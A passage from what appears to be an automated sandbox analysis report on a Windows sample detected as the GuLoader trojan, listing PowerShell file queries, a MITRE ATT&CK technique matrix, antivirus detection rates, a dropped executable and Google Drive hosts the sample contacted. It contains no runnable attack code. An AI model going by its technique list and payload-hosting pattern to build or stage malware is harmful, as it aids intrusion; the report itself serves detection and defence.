      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D68

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		411
      Process Injection      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Shared Modules      		Logon Script (Windows)Logon Script (Windows)411
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      LMSxhK1u8Z.exe72%VirustotalBrowse
      LMSxhK1u8Z.exe58%ReversingLabsWin32.Trojan.Guloader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Calcifuge.exe58%ReversingLabsWin32.Trojan.Guloader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.google.comT0%Avira URL Cloudsafe
      https://www.google.comZ0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.16.206
      		truefalse
        		high
        drive.usercontent.google.com
        		172.217.16.129
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://translate.google.com/translate_a/element.jsCalcifuge.exe, 00000006.00000003.2674238544.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801648990.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2114052097.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720728205.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457672683.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023F9000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252231902.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514790194.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332116725.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240637049.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023FA000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/J.Calcifuge.exe, 00000006.00000003.2767990267.00000000023DF000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/sCalcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 